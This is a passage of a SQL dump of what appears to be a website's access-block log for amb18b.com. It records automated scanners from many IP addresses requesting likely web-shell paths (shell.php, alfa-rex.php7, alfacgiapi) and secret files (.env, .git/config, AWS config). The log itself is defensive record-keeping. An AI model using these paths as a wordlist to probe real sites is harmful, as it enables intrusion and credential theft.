14:43:24'),(4938,'https://amb18b.com/config.php','40.122.52.254','Direct Access',1,'2025-11-08 14:43:25','2025-11-08 14:43:25'),(4939,'https://amb18b.com/qa.php','4.241.170.137','Direct Access',1,'2025-11-08 17:51:53','2025-11-08 17:51:53'),(4940,'https://amb18b.com/chosen.php','4.241.170.137','Direct Access',1,'2025-11-08 17:51:55','2025-11-08 17:51:55'),(4941,'https://amb18b.com/.well-known/acme-challenge/index.php','4.241.170.137','Direct Access',1,'2025-11-08 17:51:56','2025-11-08 17:51:56'),(4942,'https://amb18b.com/wxo.php','4.241.170.137','Direct Access',1,'2025-11-08 17:51:57','2025-11-08 17:51:57'),(4943,'https://amb18b.com/wp-admin/includes/xmrlpc.php?p=','4.241.170.137','Direct Access',1,'2025-11-08 17:51:59','2025-11-08 17:51:59'),(4944,'https://amb18b.com/wp-includes/fonts/index.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:00','2025-11-08 17:52:00'),(4945,'https://amb18b.com/wp-includes/images/wp-login.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:01','2025-11-08 17:52:01'),(4946,'https://amb18b.com/02.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:02','2025-11-08 17:52:02'),(4947,'https://amb18b.com/abcd.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:03','2025-11-08 17:52:03'),(4948,'https://amb18b.com/error.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:05','2025-11-08 17:52:05'),(4949,'https://amb18b.com/yy.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:06','2025-11-08 17:52:06'),(4950,'https://amb18b.com/.well-known/index.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:07','2025-11-08 17:52:07'),(4951,'https://amb18b.com/.well-known/acme-challenge/LA.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:08','2025-11-08 17:52:08'),(4952,'https://amb18b.com/6.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:09','2025-11-08 17:52:09'),(4953,'https://amb18b.com/class.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:10','2025-11-08 17:52:10'),(4954,'https://amb18b.com/mail.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:11','2025-11-08 17:52:11'),(4955,'https://amb18b.com/lv.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:12','2025-11-08 17:52:12'),(4956,'https://amb18b.com/zwso.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:14','2025-11-08 17:52:14'),(4957,'https://amb18b.com/filemanager/dialog.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:15','2025-11-08 17:52:15'),(4958,'https://amb18b.com/r.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:16','2025-11-08 17:52:16'),(4959,'https://amb18b.com/admin/function.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:18','2025-11-08 17:52:18'),(4960,'https://amb18b.com/js/fm.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:19','2025-11-08 17:52:19'),(4961,'https://amb18b.com/buy.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:20','2025-11-08 17:52:20'),(4962,'https://amb18b.com/s.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:21','2025-11-08 17:52:21'),(4963,'https://amb18b.com/akcc.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:22','2025-11-08 17:52:22'),(4964,'https://amb18b.com/qing.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:23','2025-11-08 17:52:23'),(4965,'https://amb18b.com/w.php?p=','4.241.170.137','Direct Access',1,'2025-11-08 17:52:25','2025-11-08 17:52:25'),(4966,'https://amb18b.com/wp-admin/images/singlep.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:26','2025-11-08 17:52:26'),(4967,'https://amb18b.com/.well-known/pki-validation/alfacgiapi/wawe_gH298.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:27','2025-11-08 17:52:27'),(4968,'https://amb18b.com/class20.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:28','2025-11-08 17:52:28'),(4969,'https://amb18b.com/vendor/nikic/php-parser/parser.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:29','2025-11-08 17:52:29'),(4970,'https://amb18b.com/upload/wp-info.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:30','2025-11-08 17:52:30'),(4971,'https://amb18b.com/wp-includes/assets/index.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:34','2025-11-08 17:52:34'),(4972,'https://amb18b.com/cf.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:36','2025-11-08 17:52:36'),(4973,'https://amb18b.com/bak.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:37','2025-11-08 17:52:37'),(4974,'https://amb18b.com/AxAo.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:38','2025-11-08 17:52:38'),(4975,'https://amb18b.com/worksec.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:40','2025-11-08 17:52:40'),(4976,'https://amb18b.com/chosen.php?','4.241.170.137','Direct Access',1,'2025-11-08 17:52:41','2025-11-08 17:52:41'),(4977,'https://amb18b.com/sx.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:43','2025-11-08 17:52:43'),(4978,'https://amb18b.com/minik.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:44','2025-11-08 17:52:44'),(4979,'https://amb18b.com/d2.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:45','2025-11-08 17:52:45'),(4980,'https://amb18b.com/index/function.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:47','2025-11-08 17:52:47'),(4981,'https://amb18b.com/456.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:49','2025-11-08 17:52:49'),(4982,'https://amb18b.com/wp-includes/block-patterns/index.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:50','2025-11-08 17:52:50'),(4983,'https://amb18b.com/wp-gr.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:51','2025-11-08 17:52:51'),(4984,'https://amb18b.com/admin/upload/css.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:52','2025-11-08 17:52:52'),(4985,'https://amb18b.com/berlin.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:54','2025-11-08 17:52:54'),(4986,'https://amb18b.com/themes.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:55','2025-11-08 17:52:55'),(4987,'https://amb18b.com/css/index.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:57','2025-11-08 17:52:57'),(4988,'https://amb18b.com/wp-includes/Text/Diff/Engine/about.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:58','2025-11-08 17:52:58'),(4989,'https://amb18b.com/13k.php','4.241.170.137','Direct Access',1,'2025-11-08 17:52:59','2025-11-08 17:52:59'),(4990,'https://amb18b.com/web/wp-login.php','4.241.170.137','Direct Access',1,'2025-11-08 17:53:00','2025-11-08 17:53:00'),(4991,'https://amb18b.com/c.php','4.241.170.137','Direct Access',1,'2025-11-08 17:53:01','2025-11-08 17:53:01'),(4992,'https://amb18b.com/ioxi002.PhP7','4.241.170.137','Direct Access',1,'2025-11-08 17:53:02','2025-11-08 17:53:03'),(4993,'https://amb18b.com/file.php?','4.241.170.137','Direct Access',1,'2025-11-08 17:53:04','2025-11-08 17:53:04'),(4994,'https://amb18b.com/info/info.php','4.241.170.137','Direct Access',1,'2025-11-08 17:53:05','2025-11-08 17:53:05'),(4995,'https://amb18b.com/.well-known/log.php','4.241.170.137','Direct Access',1,'2025-11-08 17:53:07','2025-11-08 17:53:07'),(4996,'https://amb18b.com/uwu2.php','4.241.170.137','Direct Access',1,'2025-11-08 17:53:08','2025-11-08 17:53:08'),(4997,'https://amb18b.com/filename.php','4.241.170.137','Direct Access',1,'2025-11-08 17:53:09','2025-11-08 17:53:09'),(4998,'https://amb18b.com/20.php','4.241.170.137','Direct Access',1,'2025-11-08 17:53:11','2025-11-08 17:53:11'),(4999,'https://amb18b.com/wp-includes/theme-compat/wp-login.php','4.241.170.137','Direct Access',1,'2025-11-08 17:53:12','2025-11-08 17:53:12'),(5000,'https://amb18b.com/wp-includes/widgets//include.php','4.241.170.137','Direct Access',1,'2025-11-08 17:53:14','2025-11-08 17:53:14'),(5001,'https://amb18b.com/jp.php','4.241.170.137','Direct Access',1,'2025-11-08 17:53:15','2025-11-08 17:53:15'),(5002,'https://amb18b.com/wp-2019.php?','4.241.170.137','Direct Access',1,'2025-11-08 17:53:16','2025-11-08 17:53:16'),(5003,'https://amb18b.com/fw.php','4.241.170.137','Direct Access',1,'2025-11-08 17:53:18','2025-11-08 17:53:18'),(5004,'https://amb18b.com/a.php','4.241.170.137','Direct Access',1,'2025-11-08 17:53:19','2025-11-08 17:53:19'),(5005,'https://amb18b.com/manager.php?p=','4.241.170.137','Direct Access',1,'2025-11-08 17:53:21','2025-11-08 17:53:21'),(5006,'https://amb18b.com/a1.php','4.241.170.137','Direct Access',1,'2025-11-08 17:53:22','2025-11-08 17:53:22'),(5007,'https://amb18b.com/inputs.php','4.241.170.137','Direct Access',1,'2025-11-08 17:53:23','2025-11-08 17:53:23'),(5008,'https://amb18b.com/wp-includes/theme-compat/chosen.php','4.241.170.137','Direct Access',1,'2025-11-08 17:53:24','2025-11-08 17:53:24'),(5009,'https://amb18b.com/w.php','4.241.170.137','Direct Access',1,'2025-11-08 17:53:25','2025-11-08 17:53:25'),(5010,'https://amb18b.com/7.php','4.241.170.137','Direct Access',1,'2025-11-08 17:53:27','2025-11-08 17:53:27'),(5011,'https://amb18b.com/V3.php','4.241.170.137','Direct Access',1,'2025-11-08 17:53:28','2025-11-08 17:53:28'),(5012,'https://amb18b.com/config.php','4.241.170.137','Direct Access',1,'2025-11-08 17:53:29','2025-11-08 17:53:29'),(5013,'https://amb18b.com/graphql','209.38.208.202','Direct Access',1,'2025-11-08 21:47:42','2025-11-08 21:47:42'),(5014,'https://amb18b.com/api','209.38.208.202','Direct Access',1,'2025-11-08 21:47:43','2025-11-08 21:47:43'),(5015,'https://amb18b.com/api/graphql','209.38.208.202','Direct Access',1,'2025-11-08 21:47:44','2025-11-08 21:47:44'),(5016,'https://amb18b.com/graphql/api','209.38.208.202','Direct Access',1,'2025-11-08 21:47:45','2025-11-08 21:47:45'),(5017,'https://amb18b.com/api/gql','209.38.208.202','Direct Access',1,'2025-11-08 21:47:46','2025-11-08 21:47:46'),(5018,'https://amb18b.com/swagger-ui.html','209.38.208.202','Direct Access',1,'2025-11-08 21:47:47','2025-11-08 21:47:47'),(5019,'https://amb18b.com/swagger/index.html','209.38.208.202','Direct Access',1,'2025-11-08 21:47:48','2025-11-08 21:47:48'),(5020,'https://amb18b.com/swagger/swagger-ui.html','209.38.208.202','Direct Access',1,'2025-11-08 21:47:49','2025-11-08 21:47:49'),(5021,'https://amb18b.com/webjars/swagger-ui/index.html','209.38.208.202','Direct Access',1,'2025-11-08 21:47:50','2025-11-08 21:47:50'),(5022,'https://amb18b.com/swagger.json','209.38.208.202','Direct Access',1,'2025-11-08 21:47:51','2025-11-08 21:47:51'),(5023,'https://amb18b.com/swagger/v1/swagger.json','209.38.208.202','Direct Access',1,'2025-11-08 21:47:52','2025-11-08 21:47:52'),(5024,'https://amb18b.com/v2/api-docs','209.38.208.202','Direct Access',1,'2025-11-08 21:47:53','2025-11-08 21:47:53'),(5025,'https://amb18b.com/v3/api-docs','209.38.208.202','Direct Access',1,'2025-11-08 21:47:53','2025-11-08 21:47:53'),(5026,'https://amb18b.com/api-docs/swagger.json','209.38.208.202','Direct Access',1,'2025-11-08 21:47:54','2025-11-08 21:47:54'),(5027,'https://amb18b.com/api/swagger.json','209.38.208.202','Direct Access',1,'2025-11-08 21:47:55','2025-11-08 21:47:55'),(5028,'https://amb18b.com/@vite/env','209.38.208.202','Direct Access',1,'2025-11-08 21:47:56','2025-11-08 21:47:56'),(5029,'https://amb18b.com/actuator/env','209.38.208.202','Direct Access',1,'2025-11-08 21:47:57','2025-11-08 21:47:57'),(5030,'https://amb18b.com/server','209.38.208.202','Direct Access',1,'2025-11-08 21:47:58','2025-11-08 21:47:58'),(5031,'https://amb18b.com/.vscode/sftp.json','209.38.208.202','Direct Access',1,'2025-11-08 21:47:59','2025-11-08 21:47:59'),(5032,'https://amb18b.com/about','209.38.208.202','Direct Access',1,'2025-11-08 21:47:59','2025-11-08 21:47:59'),(5033,'https://amb18b.com/debug/default/view?panel=config','209.38.208.202','Direct Access',1,'2025-11-08 21:48:00','2025-11-08 21:48:00'),(5034,'https://amb18b.com/v2/_catalog','209.38.208.202','Direct Access',1,'2025-11-08 21:48:01','2025-11-08 21:48:01'),(5035,'https://amb18b.com/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application','209.38.208.202','Direct Access',1,'2025-11-08 21:48:02','2025-11-08 21:48:02'),(5036,'https://amb18b.com/server-status','209.38.208.202','Direct Access',1,'2025-11-08 21:48:03','2025-11-08 21:48:03'),(5037,'https://amb18b.com/login.action','209.38.208.202','Direct Access',1,'2025-11-08 21:48:04','2025-11-08 21:48:04'),(5038,'https://amb18b.com/_all_dbs','209.38.208.202','Direct Access',1,'2025-11-08 21:48:05','2025-11-08 21:48:05'),(5039,'https://amb18b.com/.DS_Store','209.38.208.202','Direct Access',1,'2025-11-08 21:48:06','2025-11-08 21:48:06'),(5040,'https://amb18b.com/.env','209.38.208.202','Direct Access',1,'2025-11-08 21:48:07','2025-11-08 21:48:07'),(5041,'https://amb18b.com/.git/config','209.38.208.202','Direct Access',1,'2025-11-08 21:48:07','2025-11-08 21:48:07'),(5042,'https://amb18b.com/s/7383e2934313e27363e2237313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties','209.38.208.202','Direct Access',1,'2025-11-08 21:48:08','2025-11-08 21:48:08'),(5043,'https://amb18b.com/config.json','209.38.208.202','Direct Access',1,'2025-11-08 21:48:09','2025-11-08 21:48:09'),(5044,'https://amb18b.com/telescope/requests','209.38.208.202','Direct Access',1,'2025-11-08 21:48:10','2025-11-08 21:48:10'),(5045,'https://amb18b.com/info.php','209.38.208.202','Direct Access',1,'2025-11-08 21:48:11','2025-11-08 21:48:11'),(5046,'https://amb18b.com/postnews.php','136.144.19.86','Direct Access',1,'2025-11-09 01:07:41','2025-11-09 01:07:41'),(5047,'https://amb18b.com/wp-admin/postnews.php','216.24.219.183','Direct Access',1,'2025-11-09 01:07:46','2025-11-09 01:07:46'),(5048,'https://amb18b.com/.env','195.178.110.242','Direct Access',1,'2025-11-09 01:18:19','2025-11-09 01:18:19'),(5049,'https://amb18b.com/postnews.php','141.98.11.175','Direct Access',1,'2025-11-09 02:04:55','2025-11-09 02:04:55'),(5050,'https://amb18b.com//wp-includes/wlwmanifest.xml','34.123.159.101','Direct Access',1,'2025-11-09 03:34:44','2025-11-09 03:34:44'),(5051,'https://amb18b.com//?author=2','34.123.159.101','Direct Access',1,'2025-11-09 03:34:46','2025-11-09 03:34:46'),(5052,'https://amb18b.com/%22https:/megabet333.biz/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6%22','195.178.110.201','Direct Access',1,'2025-11-09 04:40:38','2025-11-09 04:40:38'),(5053,'https://amb18b.com/%22https:/megabet333.biz/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1%22','195.178.110.201','Direct Access',1,'2025-11-09 04:41:25','2025-11-09 04:41:25'),(5054,'https://amb18b.com/%22https:/megabet333.biz/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3%22','195.178.110.201','Direct Access',1,'2025-11-09 04:41:26','2025-11-09 04:41:26'),(5055,'https://amb18b.com/%22https:/megabet333.biz/wp-includes/js/jquery/jquery.min.js?ver=3.7.1%22','195.178.110.201','Direct Access',1,'2025-11-09 04:41:27','2025-11-09 04:41:27'),(5056,'https://amb18b.com/%22https:/megabet333.biz/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6%22','195.178.110.201','Direct Access',1,'2025-11-09 04:42:33','2025-11-09 04:42:33'),(5057,'https://amb18b.com/.env','195.178.110.201','Direct Access',1,'2025-11-09 04:43:20','2025-11-09 04:43:20'),(5058,'https://amb18b.com/.git/config','195.178.110.201','Direct Access',1,'2025-11-09 04:43:22','2025-11-09 04:43:22'),(5059,'https://amb18b.com/backend/.env','195.178.110.201','Direct Access',1,'2025-11-09 04:43:25','2025-11-09 04:43:25'),(5060,'https://amb18b.com/admin/.env','195.178.110.201','Direct Access',1,'2025-11-09 04:43:28','2025-11-09 04:43:28'),(5061,'https://amb18b.com/core/.env','195.178.110.201','Direct Access',1,'2025-11-09 04:43:31','2025-11-09 04:43:31'),(5062,'https://amb18b.com/.env.bak','195.178.110.201','Direct Access',1,'2025-11-09 04:43:33','2025-11-09 04:43:33'),(5063,'https://amb18b.com/.git/logs/HEAD','195.178.110.201','Direct Access',1,'2025-11-09 04:43:36','2025-11-09 04:43:36'),(5064,'https://amb18b.com/.gitlab-ci.yml','195.178.110.201','Direct Access',1,'2025-11-09 04:43:39','2025-11-09 04:43:39'),(5065,'https://amb18b.com/config.json','195.178.110.201','Direct Access',1,'2025-11-09 04:43:42','2025-11-09 04:43:42'),(5066,'https://amb18b.com/config.js','195.178.110.201','Direct Access',1,'2025-11-09 04:43:44','2025-11-09 04:43:44'),(5067,'https://amb18b.com/aws-config.js','195.178.110.201','Direct Access',1,'2025-11-09 04:43:49','2025-11-09 04:43:49'),(5068,'https://amb18b.com/aws.config.js','195.178.110.201','Direct Access',1,'2025-11-09 04:43:51','2025-11-09 04:43:51'),(5069,'https://amb18b.com/wp-plain.php','74.176.187.23','Invalid Referrer',1,'2025-11-09 06:01:13','2025-11-09 06:01:13'),(5070,'https://amb18b.com/ALFA_DATA/alfacgiapi/perl.alfa','74.176.187.23','Invalid Referrer',1,'2025-11-09 06:01:13','2025-11-09 06:01:13'),(5071,'https://amb18b.com/','74.176.187.23','Invalid Referrer',2,'2025-11-09 06:01:16','2025-11-09 06:01:15'),(5072,'https://amb18b.com/alfacgiapi/perl.alfa','74.176.187.23','Invalid Referrer',1,'2025-11-09 06:01:17','2025-11-09 06:01:17'),(5073,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','74.176.187.23','Direct Access',1,'2025-11-09 06:01:18','2025-11-09 06:01:18'),(5074,'https://amb18b.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','74.176.187.23','Direct Access',1,'2025-11-09 06:01:20','2025-11-09 06:01:20'),(5075,'https://amb18b.com/userfuns.php','196.251.88.246','Invalid Referrer',1,'2025-11-09 06:18:02','2025-11-09 06:18:02'),(5076,'https://amb18b.com/userfuns.php','196.251.88.246','Invalid Referrer',1,'2025-11-09 06:18:03','2025-11-09 06:18:03'),(5077,'https://amb18b.com/postnews.php','196.251.88.246','Invalid Referrer',2,'2025-11-09 06:18:16','2025-11-09 06:18:14'),(5078,'https://amb18b.com//wp-includes/ID3/license.txt','82.102.18.126','Direct Access',1,'2025-11-09 06:53:30','2025-11-09 06:53:30'),(5079,'https://amb18b.com/?author=2','82.102.18.126','Direct Access',1,'2025-11-09 06:53:33','2025-11-09 06:53:33'),(5080,'https://amb18b.com/.git/config','54.159.162.148','Direct Access',1,'2025-11-09 07:16:00','2025-11-09 07:16:00'),(5081,'https://amb18b.com/shoha.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:03','2025-11-09 07:34:03'),(5082,'https://amb18b.com/past.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:04','2025-11-09 07:34:04'),(5083,'https://amb18b.com/20ojy.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:06','2025-11-09 07:34:06'),(5084,'https://amb18b.com/block-bindings.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:08','2025-11-09 07:34:08'),(5085,'https://amb18b.com/%20colors.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:10','2025-11-09 07:34:10'),(5086,'https://amb18b.com/layout.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:12','2025-11-09 07:34:12'),(5087,'https://amb18b.com/end.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:14','2025-11-09 07:34:14'),(5088,'https://amb18b.com/uploat.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:16','2025-11-09 07:34:16'),(5089,'https://amb18b.com/uploxe.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:17','2025-11-09 07:34:17'),(5090,'https://amb18b.com/credits.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:19','2025-11-09 07:34:19'),(5091,'https://amb18b.com/pwnd.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:21','2025-11-09 07:34:21'),(5092,'https://amb18b.com/Jcrop.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:23','2025-11-09 07:34:23'),(5093,'https://amb18b.com/go.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:25','2025-11-09 07:34:25'),(5094,'https://amb18b.com/alfa-rex.php7','172.190.142.176','Direct Access',1,'2025-11-09 07:34:27','2025-11-09 07:34:27'),(5095,'https://amb18b.com/pepe.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:29','2025-11-09 07:34:29'),(5096,'https://amb18b.com/pt.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:30','2025-11-09 07:34:30'),(5097,'https://amb18b.com/about.php7','172.190.142.176','Direct Access',1,'2025-11-09 07:34:32','2025-11-09 07:34:32'),(5098,'https://amb18b.com/abruzi.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:34','2025-11-09 07:34:34'),(5099,'https://amb18b.com/1wx.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:36','2025-11-09 07:34:36'),(5100,'https://amb18b.com/gool.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:38','2025-11-09 07:34:38'),(5101,'https://amb18b.com/wp-is.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:40','2025-11-09 07:34:40'),(5102,'https://amb18b.com/ae.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:42','2025-11-09 07:34:42'),(5103,'https://amb18b.com/Auth.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:44','2025-11-09 07:34:44'),(5104,'https://amb18b.com/ropyx.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:46','2025-11-09 07:34:46'),(5105,'https://amb18b.com/14.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:48','2025-11-09 07:34:48'),(5106,'https://amb18b.com/2.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:50','2025-11-09 07:34:50'),(5107,'https://amb18b.com/Hd.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:52','2025-11-09 07:34:52'),(5108,'https://amb18b.com/getid3s.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:54','2025-11-09 07:34:54'),(5109,'https://amb18b.com/Alex-Cross.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:55','2025-11-09 07:34:55'),(5110,'https://amb18b.com/404.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:57','2025-11-09 07:34:57'),(5111,'https://amb18b.com/403.php','172.190.142.176','Direct Access',1,'2025-11-09 07:34:59','2025-11-09 07:34:59'),(5112,'https://amb18b.com/chosen.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:01','2025-11-09 07:35:01'),(5113,'https://amb18b.com/admin-post.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:03','2025-11-09 07:35:03'),(5114,'https://amb18b.com/pomo.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:04','2025-11-09 07:35:04'),(5115,'https://amb18b.com/up.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:06','2025-11-09 07:35:06'),(5116,'https://amb18b.com/wp.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:08','2025-11-09 07:35:08'),(5117,'https://amb18b.com/content.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:10','2025-11-09 07:35:10'),(5118,'https://amb18b.com/cong.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:12','2025-11-09 07:35:12'),(5119,'https://amb18b.com/blue.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:13','2025-11-09 07:35:13'),(5120,'https://amb18b.com/css.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:15','2025-11-09 07:35:15'),(5121,'https://amb18b.com/js.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:17','2025-11-09 07:35:17'),(5122,'https://amb18b.com/user.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:19','2025-11-09 07:35:19'),(5123,'https://amb18b.com/coffee.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:21','2025-11-09 07:35:21'),(5124,'https://amb18b.com/system.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:22','2025-11-09 07:35:22'),(5125,'https://amb18b.com/shell.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:25','2025-11-09 07:35:25'),(5126,'https://amb18b.com/m.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:27','2025-11-09 07:35:27'),(5127,'https://amb18b.com/sto.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:29','2025-11-09 07:35:29'),(5128,'https://amb18b.com/db.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:30','2025-11-09 07:35:30'),(5129,'https://amb18b.com/222.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:32','2025-11-09 07:35:32'),(5130,'https://amb18b.com/o.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:34','2025-11-09 07:35:34'),(5131,'https://amb18b.com/an.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:36','2025-11-09 07:35:36'),(5132,'https://amb18b.com/gmo.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:38','2025-11-09 07:35:38'),(5133,'https://amb18b.com/file.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:40','2025-11-09 07:35:40'),(5134,'https://amb18b.com/file5.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:42','2025-11-09 07:35:42'),(5135,'https://amb18b.com/file17.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:44','2025-11-09 07:35:44'),(5136,'https://amb18b.com/file32.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:46','2025-11-09 07:35:46'),(5137,'https://amb18b.com/file3.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:48','2025-11-09 07:35:48'),(5138,'https://amb18b.com/file6.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:50','2025-11-09 07:35:50'),(5139,'https://amb18b.com/file15.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:52','2025-11-09 07:35:52'),(5140,'https://amb18b.com/file9.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:54','2025-11-09 07:35:54'),(5141,'https://amb18b.com/error.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:56','2025-11-09 07:35:56'),(5142,'https://amb18b.com/NH19T66T.php','172.190.142.176','Direct Access',1,'2025-11-09 07:35:58','2025-11-09 07:35:58'),(5143,'https://amb18b.com/rei.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:00','2025-11-09 07:36:00'),(5144,'https://amb18b.com/666.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:02','2025-11-09 07:36:02'),(5145,'https://amb18b.com/777.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:04','2025-11-09 07:36:04'),(5146,'https://amb18b.com/888.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:06','2025-11-09 07:36:06'),(5147,'https://amb18b.com/555.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:08','2025-11-09 07:36:08'),(5148,'https://amb18b.com/333.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:10','2025-11-09 07:36:10'),(5149,'https://amb18b.com/zeal.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:12','2025-11-09 07:36:12'),(5150,'https://amb18b.com/file1.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:13','2025-11-09 07:36:13'),(5151,'https://amb18b.com/file2.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:15','2025-11-09 07:36:15'),(5152,'https://amb18b.com/filesss.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:17','2025-11-09 07:36:17'),(5153,'https://amb18b.com/file13.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:19','2025-11-09 07:36:19'),(5154,'https://amb18b.com/atomlib.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:21','2025-11-09 07:36:21'),(5155,'https://amb18b.com/manager.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:23','2025-11-09 07:36:23'),(5156,'https://amb18b.com/abcd.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:25','2025-11-09 07:36:25'),(5157,'https://amb18b.com/efile.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:27','2025-11-09 07:36:27'),(5158,'https://amb18b.com/file18.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:29','2025-11-09 07:36:29'),(5159,'https://amb18b.com/520.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:31','2025-11-09 07:36:31'),(5160,'https://amb18b.com/031.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:33','2025-11-09 07:36:33'),(5161,'https://amb18b.com/file7.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:36','2025-11-09 07:36:36'),(5162,'https://amb18b.com/file4.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:39','2025-11-09 07:36:39'),(5163,'https://amb18b.com/2%25.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:40','2025-11-09 